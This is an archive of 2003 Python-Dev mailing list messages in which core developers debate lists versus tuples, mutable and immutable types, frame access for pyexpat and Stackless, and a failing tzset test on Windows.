From: guido@python.org (Guido van Rossum)
Date: Fri, 14 Mar 2003 12:55:22 -0500
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: "Your message of Fri, 14 Mar 2003 17:06:14 +0100."
 <r01050400-1023-0BB5B694564011D7A5D1003065D5E7E4@[10.0.0.23]>
References: <r01050400-1023-0BB5B694564011D7A5D1003065D5E7E4@[10.0.0.23]>
Message-ID: <200303141755.h2EHtMA03501@pcp02138704pcs.reston01.va.comcast.net>

> FWIW, I quite like the way how the core classes in Cocoa/NextStep are
> designed. For each container-ish object there's a mutable an immutable
> variant, where the mutable variant is usually a subclass of the
> immutable one. Examples:
>   NSString -> NSMutableString
>   NSData -> NSMutableData
>   NSArray -> NSMutableArray
>   NSDictionary -> NSMutableDictionary

This has its downside too though.  A function designed to take an
immutable class instance cannot rely on the class instance to remain
unchanged, because the caller could pass it an instance of the
corresponding mutable subclass!  (For example, the function might use
the argument as a dict key.)  In some sense this inheritance pattern
breaks the "Liskov substibutability" principle: if B is a base class
of C, whenever a B instance is expected, a C instance may be used.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tismer@tismer.com  Fri Mar 14 18:05:05 2003
From: tismer@tismer.com (Christian Tismer)
Date: Fri, 14 Mar 2003 19:05:05 +0100
Subject: [Python-Dev] PyEval_GetFrame() revisited
In-Reply-To: <3E7204EC.60506@tismer.com>
References: <3E7204EC.60506@tismer.com>
Message-ID: <3E7219D1.6090306@tismer.com>

Christian Tismer wrote:
> Hi there!
> 
> here has been this patch to the threadstate, which
> allows to override the tstate's frame access.
> 
> I just saw the part of the patch that modifies
> pyexpat:
> 
> 
>       f = PyFrame_New(
>                       tstate,            /*back*/
>                       c,                /*code*/
> !                     PyEval_GetGlobals(),    /*globals*/
>                       NULL            /*locals*/
> 
> where the PyEval_GetGLobals is used instead of
>               tstate->frame->f_globals
> 
> Well, this unfortunately is not sufficient
> for this module, since pyexpat still *has* direct
> access to tstate->frame, in a much worse way:
> pyexpat does read and write the frame variable!

Ah!!
Can it be that PyEval_GetFrame() is just indended
to signal to an extension like Psyco that it needs
to quickly invent a frame now?
So it is *not* thought of to be a complete interface
for accessing tstate->frame no longer explicitly,
is is only meant for read access?

So I can't move it elsewhere and probably need
to work around that forever, unless we also
write PyEval_SetFrame()

sigh - ciao - chris
-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From fdrake@acm.org  Fri Mar 14 19:07:37 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Fri, 14 Mar 2003 14:07:37 -0500
Subject: [Python-Dev] PyEval_GetFrame() revisited
In-Reply-To: <3E7204EC.60506@tismer.com>
References: <3E7204EC.60506@tismer.com>
 <3E7219D1.6090306@tismer.com>
Message-ID: <15986.10361.70059.323966@grendel.zope.com>

Christian Tismer writes:
 > Hi there!

Good afternoon!

 > here has been this patch to the threadstate, which
 > allows to override the tstate's frame access.
...
 > Reason why I'm thinking about this:
 > In order to simplify Stackless, I thought to remove
 > the frame variable, and let it be accessed always
 > via my current tasklet, which holds the frame.
 > 
 > Looking for the number of necessary patches, I stumbled
 > over PyExpat, and thought I should better keep my
 > hands off. Too bad.
 > 
 > Does it make sense to think about an API for
 > modifying the frame? Or are we at a dead end here?

What's being modified isn't the frame but the tstate, but it may be
reasonable to provide some API to manipulate the "current" frame.

I think pyexpat is unique in doing this, but it actually makes a lot
of sense; there are other modules for which a similar behavior is
likely to be appropriate (one example I can think of is Fredrik's
sgmlop module).

What pyexpat is trying to achieve is fairly simple, and I don't think
there's a better way currently.  When Python code calls the Parse() or
ParseFile() method of a parser object (returned from
pyexpat.ParserCreate()), the parser can generate many different
callbacks into Python code.  pyexpat generates an artificial code
object and frame that can be used to generate more useful tracebacks
when exceptions are raise within callbacks; the code object indicates
which callback Expat triggered, separately from the function assigned
to handle that callback.  This makes it much easier to debug handler
functions.

If there were API functions to get/set the frame, pyexpat wouldn't
need to poke into the tstate at all.  Would that alleviate the
difficulties this creates for Stackless / Psycho?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From zooko@zooko.com  Fri Mar 14 19:09:02 2003
From: zooko@zooko.com (Zooko)
Date: Fri, 14 Mar 2003 14:09:02 -0500
Subject: [Python-Dev] mutability (was: lists v. tuples)
In-Reply-To: Message from Guido van Rossum <guido@python.org>
 of "Fri, 14 Mar 2003 12:55:22 EST." <200303141755.h2EHtMA03501@pcp02138704pcs.reston01.va.comcast.net>
References: <r01050400-1023-0BB5B694564011D7A5D1003065D5E7E4@[10.0.0.23]>  <200303141755.h2EHtMA03501@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <E18tuYA-0007f1-00@localhost>

 GvR wrote:
>
> This has its downside too though.  A function designed to take an
> immutable class instance cannot rely on the class instance to remain
> unchanged, because the caller could pass it an instance of the
> corresponding mutable subclass!  (For example, the function might use
> the argument as a dict key.)  In some sense this inheritance pattern
> breaks the "Liskov substibutability" principle: if B is a base class
> of C, whenever a B instance is expected, a C instance may be used.

Indeed!

Presumably the designers of the NextStep libraries thought to themselves that 
they couldn't do it the other way (have NSArray subclass NSMutableArray) because 
NSArray couldn't provide a real implementation of a mutation method like 
"NSArray addObject".

If you include the immutability guarantee as well as the methods in the 
"contract" offered by an interface, then its clear that neither can be a 
Liskov-substitution-principle-preserving subtype of the other.

The E Language paid careful attention to this issue because a surprise about 
mutability could easily be a security hole.  Their solution is quite Pythonic, 
inasmuch as type-checking is dynamic, structural (an object matches a type if it 
offers the interface regardless of whether it is explicitly declared to be a 
subtype), and soft (an object can implement only part of a type).

These are the three noble features of Python's type system.  (I occasionally 
hear about efforts to cripple Python's type system in order to make it as 
ungainly as Java's, but fortunately they always seem to fade away...)

So in E, it's the same: if you are expecting a mutable list (a "FlexList") and 
you get an immutable one, you'll get an exception at run-time if you try a 
mutation operation like mylist.append("spam").

Like Python, E's strings do the right thing if you invoke immutable list 
("ConstList") methods on them.

The syntax for constructing maps and lists and indexing them is similar to 
Python's.  That syntax always constructs immutable structures, a mutable version 
of which is generated with the method "mylist.diverge()".  To get an immutable 
version of a mutable structure, you write "mylist.snapshot()".

http://erights.org/elang/quick-ref.html#Structures

Regards,

Zooko

http://zooko.com/
         ^-- newly and incompletely restored


From just@letterror.com  Fri Mar 14 19:12:06 2003
From: just@letterror.com (Just van Rossum)
Date: Fri, 14 Mar 2003 20:12:06 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <200303141755.h2EHtMA03501@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <r01050400-1023-DAFB3F86565011D7A5D1003065D5E7E4@[10.0.0.23]>

Guido van Rossum wrote:

> > FWIW, I quite like the way how the core classes in Cocoa/NextStep
> > are designed. For each container-ish object there's a mutable an
> > immutable variant, where the mutable variant is usually a subclass
> > of the immutable one. Examples:
> >   NSString -> NSMutableString
> >   NSData -> NSMutableData
> >   NSArray -> NSMutableArray
> >   NSDictionary -> NSMutableDictionary
> 
> This has its downside too though.  A function designed to take an
> immutable class instance cannot rely on the class instance to remain
> unchanged, because the caller could pass it an instance of the
> corresponding mutable subclass!  (For example, the function might use
> the argument as a dict key.)  In some sense this inheritance pattern
> breaks the "Liskov substibutability" principle: if B is a base class
> of C, whenever a B instance is expected, a C instance may be used.

I'm not sure how much relevance this principle has in a language in
which the inheritance tree has little meaning, but since I _am_ sure you
read more books about this than I did, I'll take your word for it ;-)

It's not so much the inheritance hierarchy that I like about the Cocoa
core classes, but the fact that mutability is a prominent part of the
design. I think Python would be a better language if it had a mutable
string type as well as a mutable byte-oriented data type. An immutable
dict would be handy at times. An immutable list type would be great,
too. Wait, we already have that.

Sure, tuples are often used for struct-like things and lists for that
other stuff <wink>, but I don't think it's right to say you _must_ use
them like that, and that seeing/using tuples as immutable lists is
_wrong_.

Just


From guido@python.org  Fri Mar 14 19:26:10 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 14 Mar 2003 14:26:10 -0500
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: "Your message of Fri, 14 Mar 2003 20:12:06 +0100."
 <r01050400-1023-DAFB3F86565011D7A5D1003065D5E7E4@[10.0.0.23]>
References: <r01050400-1023-DAFB3F86565011D7A5D1003065D5E7E4@[10.0.0.23]>
Message-ID: <200303141926.h2EJQBA04239@pcp02138704pcs.reston01.va.comcast.net>

> Sure, tuples are often used for struct-like things and lists for
> that other stuff <wink>, but I don't think it's right to say you
> _must_ use them like that, and that seeing/using tuples as immutable
> lists is _wrong_.

it's not wrong, but I find that many people use tuples in situations
where they should really use lists, and the immutability is
irrelevant.  Using tuples seems to be a reflex for some people because
creating a tuple saves a microsecond or so.  That sounds like the
wrong thing to let inform your reflexes...

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mcherm@mcherm.com  Fri Mar 14 20:13:39 2003
From: mcherm@mcherm.com (Chermside, Michael)
Date: Fri, 14 Mar 2003 15:13:39 -0500
Subject: [Python-Dev] Re: lists v. tuples
Message-ID: <7F171EB5E155544CAC4035F0182093F04211EE@INGDEXCHSANC1.ingdirect.com>

Just writes:
> It's not so much the inheritance hierarchy that I like about the Cocoa
> core classes, but the fact that mutability is a prominent part of the
> design. I think Python would be a better language if it had a mutable
> string type as well as a mutable byte-oriented data type. An immutable
> dict would be handy at times. An immutable list type would be great,
> too. Wait, we already have that.

I've often had the same thought myself. I'm imagining designing my
own language, and I note that both mutable and immutable strings are
handy, depending on what you're doing. The same is true of data
containers (of all sorts, lists and dicts being examples). "What the
heck?" I say to myself, "In *my* perfect language, there'll be
mutable and immutable versions of every object. (With the obvious
conversion behavior.) Why, you won't even have to code them
separately... just specify some property indicating whether or not
that instance is mutable."

Then I realize that C++ has exactly this feature (it's called "const"),
and that I find it to be an annoyance far more often than I find it
handy. And I begin to question.

Wish-I-knew-the-answer-but-I-haven't-been-enlightened-yet

-- Michael Chermside


From tismer@tismer.com  Fri Mar 14 23:29:26 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sat, 15 Mar 2003 00:29:26 +0100
Subject: [Python-Dev] PyEval_GetFrame() revisited
In-Reply-To: <15986.10361.70059.323966@grendel.zope.com>
References: <3E7204EC.60506@tismer.com>	<3E7219D1.6090306@tismer.com> <15986.10361.70059.323966@grendel.zope.com>
Message-ID: <3E7265D6.3050202@tismer.com>

Fred L. Drake, Jr. wrote:
> Christian Tismer writes:
...

>  > Does it make sense to think about an API for
>  > modifying the frame? Or are we at a dead end here?
> 
> What's being modified isn't the frame but the tstate, but it may be
> reasonable to provide some API to manipulate the "current" frame.

That was what I intended to say.

> I think pyexpat is unique in doing this, but it actually makes a lot
> of sense; there are other modules for which a similar behavior is
> likely to be appropriate (one example I can think of is Fredrik's
> sgmlop module).

I just looked into MHammond's files and found AXDebug.cpp reading
tstate's frame, too, line 192:

	PyFrameObject *frame = state ? state->frame : NULL;

WOuld be another candidate to use PyEval_GetFrame()

> What pyexpat is trying to achieve is fairly simple, and I don't think
> there's a better way currently.  When Python code calls the Parse() or
> ParseFile() method of a parser object (returned from
> pyexpat.ParserCreate()), the parser can generate many different
> callbacks into Python code.  pyexpat generates an artificial code
> object and frame that can be used to generate more useful tracebacks
> when exceptions are raise within callbacks; the code object indicates
> which callback Expat triggered, separately from the function assigned
> to handle that callback.  This makes it much easier to debug handler
> functions.

Yes, this makes very much sense, to just wrap a frame around
something to get useful tracebacks.

> If there were API functions to get/set the frame, pyexpat wouldn't
> need to poke into the tstate at all.  Would that alleviate the
> difficulties this creates for Stackless / Psycho?

I think so.
For internal functions, inside the main Python implementation,
it is no problem to maintain a number of patches, or to even
use interface functions whenre they make sense like enabling
Psyco.
For external modules, it would be nicer if certain implementation
details could be hidden, to give more freedom to implement
somethign differently, without breaking unknown modules.
PyExpat is in a grey zone, since it is already in the
Python distribution, and I had no problem to patch it.

The reason why I'm asking is that in Stackless 2.0 and above,
tstate is always carrying a so-called tasklet object which
holds the current frame. There can be many of these, while
there is only one current one per tstate, and they
can be switched at certain times. At the moment, I always have
to take care to preserve a valid tstate->frame variable,
whenever I'm switching tasklets. It would make the code much
smaller and cleaner, if I could simply redefine the current
frame to be just the frame held in the current tasklet.

Something like PyEval_SetFrame() would make sense, but there is
a problem with the protocol: After changing the frame, the
currently running interpreter would not know to execute it,
but continue to run the running one.
For normal Python, PyEval_SetFrame() would only make sense,
if the calling code would also make sure that the new frame
is run, or popped off after a special action was done.

PyExpat, as I understand, uses this frame just as a wrapper
for the case of an exception, when the frame would be used
only when a failing function returns NULL.
Stackless extends this and also knows to return a special
value instead of NULL, in order to tell the calling
interpreter to stop its action and let the new frame run.

Even in PyExpat's use, it would hard to explain the use
of such a function, I fear. But I'd really like to have it.

cheers - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From tim.one@comcast.net  Sat Mar 15 03:00:46 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 14 Mar 2003 22:00:46 -0500
Subject: [Python-Dev] tzset
Message-ID: <LNBBLJKPBEHFEDALKOLCOEDBEBAB.tim.one@comcast.net>

We seem to have added tzset() gimmicks to CVS Python.

test_time now fails on Windows, simply because time.tzset raises
AttributeError there.

Now Windows does support tzset(), but not TZ values of the form
test_time.test_tzset() is testing, like

                environ['TZ'] = 'US/Eastern'
and
            environ['TZ'] = 'Australia/Melbourne'

The rub here is that I haven't found *any* tzset man pages on the web that
claim TZ accepts such values (other than to silently ignore them because
they're not in a recognized format).  The POSIX defn is typical:

  http://www.opengroup.org/onlinepubs/007904975/basedefs/xbd_chap08.html

and search down for TZ.  There's no way to read that as supporting the
values we're testing.

Anyone have a clue?

not-all-pits-should-be-dived-into-ly y'rs  - tim


From zen@shangri-la.dropbear.id.au  Sat Mar 15 06:34:26 2003
From: zen@shangri-la.dropbear.id.au (Stuart Bishop)
Date: Sat, 15 Mar 2003 17:34:26 +1100
Subject: [Python-Dev] tzset
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEDBEBAB.tim.one@comcast.net>
Message-ID: <2ADB787D-56B0-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>

On Saturday, March 15, 2003, at 02:00  PM, Tim Peters wrote:

> We seem to have added tzset() gimmicks to CVS Python.

That was my patch.

> test_time now fails on Windows, simply because time.tzset raises
> AttributeError there.

test_time.test_tzset should only be run if time.tzset is defined
(which should only be there if configure determines that tzset works
with the TZ formats we are testing). Feel like adding a clause at the
top of test_tzset to skip the test if time.tzset is not defined, or
should I submit a patch?

> Now Windows does support tzset(), but not TZ values of the form
> test_time.test_tzset() is testing, like
>
>                 environ['TZ'] = 'US/Eastern'
> and
>             environ['TZ'] = 'Australia/Melbourne'
>
> The rub here is that I haven't found *any* tzset man pages on the web 
> that
> claim TZ accepts such values (other than to silently ignore them 
> because

It specifies the pathname to a tzfile(5) format file, relative to
a OS defined default. From BSD:
     If its value does not begin with a colon, it is first used as the 
path-
     name of a file (as described above) from which to read the time 
conver-
     sion information.  If that file cannot be read, the value is then 
inter-
     preted as a direct specification (the format is described below) of 
the
     time conversion information.
Solaris has a similar definition. Linux documents this format as 
needing to
start with a ':' but accepts it (at least I think I tested this...)

To me, this is the useful format as all the others require you to
know your DST transition times rather rely of the OS to supply them.
At the moment if the 'path to a tzfile(5)' format is not accepted, your
tzset(3) is considered broken and time.tzset not built.

I'm happy to rewrite the detection in configure.in and the test in
test_time.py to lower the bar on this, but I think a better solution
may be to determine if Windows has a format that lets us to DST
calculations and keep the bar high. I was hoping that such a format
would a) exist and b) Allow translation between the Unix standard of
Country/Region to whatever-windows-uses.

> not-all-pits-should-be-dived-into-ly y'rs  - tim

but-i-was-pushed-by-those-damn-politicans-ly y'rs

-- 
Stuart Bishop <zen@shangri-la.dropbear.id.au>
http://shangri-la.dropbear.id.au/


From drifty@alum.berkeley.edu  Sat Mar 15 06:40:16 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Fri, 14 Mar 2003 22:40:16 -0800 (PST)
Subject: [Python-Dev] tzset
In-Reply-To: <2ADB787D-56B0-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
References: <2ADB787D-56B0-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
Message-ID: <Pine.SOL.4.53.0303142237290.4751@death.OCF.Berkeley.EDU>

[Stuart Bishop]

<snip>
> I'm happy to rewrite the detection in configure.in and the test in
> test_time.py to lower the bar on this, but I think a better solution
> may be to determine if Windows has a format that lets us to DST
> calculations and keep the bar high. I was hoping that such a format
> would a) exist and b) Allow translation between the Unix standard of
> Country/Region to whatever-windows-uses.
>

If there is one thing I have learned from writing _strptime is that you
cannot be strict in the slightest for your input when it comes to
time-based data.  I think this is another case where you need to be loose
about input and strict with output.

-Brett


From aleax@aleax.it  Sat Mar 15 07:57:53 2003
From: aleax@aleax.it (Alex Martelli)
Date: Sat, 15 Mar 2003 08:57:53 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <3E71F851.3030802@tismer.com>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
Message-ID: <200303150857.53214.aleax@aleax.it>

On Friday 14 March 2003 04:42 pm, Christian Tismer wrote:
> Alex Martelli wrote:
> ...
>
> > Sorting plays with mutability by working in-place, but for many
> > uses it would be just as good if sorting returned a sorted copy
> > instead -- the key thing here is the sorting, not the mutability.
>
> And the key assumption for sorting things is that
> the things are sortable, which means there
> exists and order on the basic set.
> Which again suggests that list elements usually
> have something in common.

If a list contains ONE complex number and no other number,
then the list can be sorted.

If the list contains elements that having something in common,
by both being complex numbers, then it cannot be sorted.

So, lists whose elements have LESS in common (by being of
widely different types) are more likely to be sortable than lists
some of whose elements have in common the fact of being
numbers (if one or more of those numbers are complex).

Although not likely to give practical problems (after all I suspect
most Pythonistas never use complex numbers at all), this
anomaly (introduced in 1.6, I think) makes conceptualization
less uniform and thus somewhat harder to teach.


Alex


From guido@python.org  Sat Mar 15 12:14:50 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 15 Mar 2003 07:14:50 -0500
Subject: [Python-Dev] tzset
In-Reply-To: "Your message of Sat, 15 Mar 2003 17:34:26 +1100."
 <2ADB787D-56B0-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
References: <2ADB787D-56B0-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
Message-ID: <200303151214.h2FCEoH05946@pcp02138704pcs.reston01.va.comcast.net>

[Stuart]
> test_time.test_tzset should only be run if time.tzset is defined
> (which should only be there if configure determines that tzset works
> with the TZ formats we are testing). Feel like adding a clause at the
> top of test_tzset to skip the test if time.tzset is not defined, or
> should I submit a patch?

Done.

[Tim]
> > Now Windows does support tzset(), but not TZ values of the form
> > test_time.test_tzset() is testing, like
> >
> >                 environ['TZ'] = 'US/Eastern'
> > and
> >             environ['TZ'] = 'Australia/Melbourne'
> >
> > The rub here is that I haven't found *any* tzset man pages on the
> > web that claim TZ accepts such values (other than to silently
> > ignore them because
> 
> It specifies the pathname to a tzfile(5) format file, relative to
> a OS defined default. From BSD:
>      If its value does not begin with a colon, it is first used as
>      the pathname of a file (as described above) from which to
>      read the time conversion information.  If that file cannot be
>      read, the value is then interpreted as a direct specification
>      (the format is described below) of the time conversion
>      information.
> Solaris has a similar definition. Linux documents this format as
> needing to start with a ':' but accepts it (at least I think I
> tested this...)
> 
> To me, this is the useful format as all the others require you to
> know your DST transition times rather rely of the OS to supply them.
> At the moment if the 'path to a tzfile(5)' format is not accepted, your
> tzset(3) is considered broken and time.tzset not built.
> 
> I'm happy to rewrite the detection in configure.in and the test in
> test_time.py to lower the bar on this, but I think a better solution
> may be to determine if Windows has a format that lets us to DST
> calculations and keep the bar high. I was hoping that such a format
> would a) exist and b) Allow translation between the Unix standard of
> Country/Region to whatever-windows-uses.

Nevertheless I don't think that the standard definition for tzset()
defines which values will be accepted by a particular tzset
implementation.  So a test that relies on these is bound to fail on
systems, not because tzset is broken, but because the test makes
unfair assumptions.  Perhaps you can rewrite the test to use only
standardized input forms?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sat Mar 15 12:36:19 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 15 Mar 2003 07:36:19 -0500
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: "Your message of Sat, 15 Mar 2003 08:57:53 +0100."
 <200303150857.53214.aleax@aleax.it>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
Message-ID: <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>

> > > Sorting plays with mutability by working in-place, but for many
> > > uses it would be just as good if sorting returned a sorted copy
> > > instead -- the key thing here is the sorting, not the mutability.
> >
> > And the key assumption for sorting things is that
> > the things are sortable, which means there
> > exists and order on the basic set.
> > Which again suggests that list elements usually
> > have something in common.
> 
> If a list contains ONE complex number and no other number,
> then the list can be sorted.

But the order isn't meaningful.

> If the list contains elements that having something in common,
> by both being complex numbers, then it cannot be sorted.
> 
> So, lists whose elements have LESS in common (by being of
> widely different types) are more likely to be sortable than lists
> some of whose elements have in common the fact of being
> numbers (if one or more of those numbers are complex).
> 
> Although not likely to give practical problems (after all I suspect
> most Pythonistas never use complex numbers at all), this
> anomaly (introduced in 1.6, I think) makes conceptualization
> less uniform and thus somewhat harder to teach.

If I had to do it over again, I'd only implement == and != for objects
of vastly differing types, and limit <, <=, >, >= to objects that are
meaningfully comparable.

I'd like to to this in Python 3.0, but that probably means we'd have
to start deprecating default comparisons except (in)equality in Python
2.4.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From bbum@codefab.com  Sat Mar 15 13:46:19 2003
From: bbum@codefab.com (Bill Bumgarner)
Date: Sat, 15 Mar 2003 08:46:19 -0500
Subject: [Python-Dev] Mutability vs. Immutability (was Re: lists v. tuples)
In-Reply-To: <20030315063502.17965.17900.Mailman@mail.python.org>
Message-ID: <8068F74D-56EC-11D7-95E7-000393877AE4@codefab.com>

On Saturday, Mar 15, 2003, at 01:35 US/Eastern, 
python-dev-request@python.org wrote:
> This has its downside too though.  A function designed to take an
> immutable class instance cannot rely on the class instance to remain
> unchanged, because the caller could pass it an instance of the
> corresponding mutable subclass!  (For example, the function might use
> the argument as a dict key.)  In some sense this inheritance pattern
> breaks the "Liskov substibutability" principle: if B is a base class
> of C, whenever a B instance is expected, a C instance may be used.

In practice, this isn't an issue though it does require that the 
developer follow a couple of simple patterns.   Since Objective-C is a 
C derived language, requiring the developer to follow a couple of extra 
simple patterns isn't a big deal considering that the developer already 
has to deal with all of the really fun memory management issues 
associated with a pointer based language.

Namely, if your code takes an array-- for example-- and is going to 
hang on to the reference for a while and expect immutability, simply 
copy the array when storing it away:

- (void) setSearchPath: (NSArray *) anArray
{
     if (searchPath != anArray) {
	    [searchPath release];
	    searchPath = [anArray copy];
     }
}

If anArray is mutable, the invocation of -copy creates an immutable 
copy of the array without copying its contents.  If anArray is 
immutable, -copy simply returns the same array with the reference count 
bumped by one:

// NSArray implementation
- copy
{
     return [self retain];
}

Easy and efficient, as long as the developer remembers to follow the 
pattern....

b.bum


From tismer@tismer.com  Sat Mar 15 15:59:19 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sat, 15 Mar 2003 16:59:19 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <200303150857.53214.aleax@aleax.it>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com> <200303150857.53214.aleax@aleax.it>
Message-ID: <3E734DD7.3080105@tismer.com>

Alex Martelli wrote:
> On Friday 14 March 2003 04:42 pm, Christian Tismer wrote:
...

>>And the key assumption for sorting things is that
>>the things are sortable, which means there
>>exists and order on the basic set.
>>Which again suggests that list elements usually
>>have something in common.
> 
> If a list contains ONE complex number and no other number,
> then the list can be sorted.

By a similar argument, tuples of one element can be sorted
and reversed, just by doing nothing :-)

> If the list contains elements that having something in common,
> by both being complex numbers, then it cannot be sorted.

Sure it can, by supplying a compare function, which implements
the particular sorting operation that you want. Perhaps you
want to sort them by their abs value or something. (And then
you probably will want a stable sort, which is meanwhile
a nice fact thanks to Tim:

 >>> a=[1, 2, 2+2j, 3+1j, 1+3j, 3-3j, 3+1j, 1+3j]
 >>> a.sort(lambda x, y:cmp(abs(x), abs(y)))
 >>> a
[1, 2, (2+2j), (3+1j), (1+3j), (3+1j), (1+3j), (3-3j)]
 >>>

)

Complex just has no total order, which makes it impossible to
provide a meaningful default ordering.

> So, lists whose elements have LESS in common (by being of
> widely different types) are more likely to be sortable than lists
> some of whose elements have in common the fact of being
> numbers (if one or more of those numbers are complex).

I agree that my statement does not apply when putting
non-sortable things into a list. But I don't believe
that people are putting widely different types into
a list in order to sort them. (Although there is an
arbitrary order between strings and numbers, which
I would drop in Python 2.4, too).

chris
-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From tjreedy@udel.edu  Sat Mar 15 17:54:05 2003
From: tjreedy@udel.edu (Terry Reedy)
Date: Sat, 15 Mar 2003 12:54:05 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com> <200303150857.53214.aleax@aleax.it> <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <b4vp23$vec$1@main.gmane.org>

"Guido van Rossum" <guido@python.org> wrote in message
news:200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net.
..
> But the order isn't meaningful.
....
> If I had to do it over again, I'd only implement == and != for
objects
> of vastly differing types, and limit <, <=, >, >= to objects that
are
> meaningfully comparable.

For user-defined types/classes, I presume that this would still mean
deferring to the appropriate magic method (__cmp__ or __ge__?) to
define 'meaningful'.

> I'd like to to this in Python 3.0, but that probably means we'd have
> to start deprecating default comparisons except (in)equality in
Python
> 2.4.

+1, I think.

Based on reading cl.py, the validity of nonsense comparisons is one of
the more surprising 'features' of Python for beginners -- who
reasonably expect a TypeError or ValueError.  Once they get past that,
they are then surprised by the unstability across versions.  Given
that universal sorting of hetero-lists is now broken, I think it would
be better to do away with it cleanly.  It is seldom needed and would
still be available with a user-defined sorting function (which
requires some thought as to what is really wanted).  A Python version
of the present algorithm could be included (in Tools/xx perhaps) for
anyone who actually needs it.

Terry J. Reedy


From aleax@aleax.it  Sat Mar 15 18:07:35 2003
From: aleax@aleax.it (Alex Martelli)
Date: Sat, 15 Mar 2003 19:07:35 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <3E734DD7.3080105@tismer.com>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303150857.53214.aleax@aleax.it> <3E734DD7.3080105@tismer.com>
Message-ID: <200303151907.35471.aleax@aleax.it>

On Saturday 15 March 2003 04:59 pm, Christian Tismer wrote:
   ...
> Complex just has no total order, which makes it impossible to
> provide a meaningful default ordering.

Back in Python 1.5.2 times, the "impossible to provide" ordering
was there.  No more (and no less!) "meaningful" than, say,
comparisons between (e.g.) lists, numbers, strings and dicts,
which _are_ still provided as of Python 2.3.

> I agree that my statement does not apply when putting
> non-sortable things into a list. But I don't believe

A list containing ONE complex number and (e.g.) three
strings is sortable.  So, there are NO "non-sortable things".

A list is non-sortable (unless by providing a custom compare,
as you pointed out) if it contains a complex number and any
other number -- so, there _are_ "non-sortable LISTS" (unless
suitable custom compares are used), but still no "non-sortable
THINGS" in current Python.

> that people are putting widely different types into
> a list in order to sort them. (Although there is an
> arbitrary order between strings and numbers, which
> I would drop in Python 2.4, too).

Such a change would indeed enormously increase the
number of non-sortable (except by providing custom
compares) lists.  So, for example, all places which get
and sort the list of keys in a dictionary in order to return 
or display the keys should presumably do the sorting
within a try/except?  Or do you think a dictionary should
also be constrained to have keys that are all comparable
with each other (i.e., presumably, never both string AND
number keys) as well as hashable?

I fail to see how forbidding me to sort the list of keys of
any arbitrary dict will enhance my productivity in any way --
it's bad enough (in theory -- in practice it doesn't bite much
as complex numbers are used so rarely) with the complex
numbers thingy, why make it even worse by inventing a
novel "strings vs numbers" split?

Since when is Python about forbidding the user to do
quite normal things such as sorting the list of keys of
any arbitrary dictionary for more elegant display -- for
no practically useful purpose that I've ever seen offered,
in brisk violation of "practicality beats purity"?


Alex


From tismer@tismer.com  Sat Mar 15 19:50:33 2003
From: tismer@tismer.com (Christian Tismer)
